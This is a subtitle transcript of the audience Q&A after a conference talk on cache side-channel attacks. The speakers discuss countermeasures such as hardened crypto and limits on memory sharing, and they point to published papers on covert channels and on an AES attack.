CM: I think the most important thing to protect would be crypto, and the good thing is that today we know how to build crypto that is resistant to side-channel attacks. So a good step would be to stop using implementations that have been known to be vulnerable for 10 years. Something like keystrokes is much harder to protect; let's say crypto is manageable, while the whole system is clearly another problem. You could have different types of countermeasures on the hardware side, but that would mean that Intel and ARM actually want to fix it, and that they know how to fix it; I don't even know how to fix that in hardware. On the system side, if you prevent some kinds of memory sharing, you don't have Flush+Reload anymore, and Prime+Probe is much noisier, so that would be an improvement.
M: Thank you.
H: Do we have signal angel questions? No. Okay, then more microphone.
M: Hi, thank you. I wanted to ask about the way you establish the side channel between the two processes, because it would obviously have to be timed in a way to transmit information from one process to the other. Is there anywhere that you documented the whole thing? It's actually almost like the seven layers, or something like that. Have you documented that anywhere? It would be really interesting to know how it worked.
ML: You can find this information in the papers, because there are several papers on covert channels using this. The NDSS paper will be published in February, I guess, but the ARMageddon paper also includes a covert channel, and you can find more information about what the packets look like and how the synchronization works in the paper.
M: Thank you.
H: One last question?
M: Hi! You mentioned that you used Osvik's attack for the AES side-channel attack. Did you solve the AES round detection, and is it different from some scheduler manipulation?
CM: For this one, I think we only did a synchronous attack, so we already knew when the victim was going to be scheduled, and we didn't have to do anything with schedulers.
M: Alright, thank you.
H: Are there any more questions? No, I don't see anyone. Then, thank you very much again to our speakers.

Applause

Music

Subtitles created by c3subtitles.de in the year 2020. Join, and help us!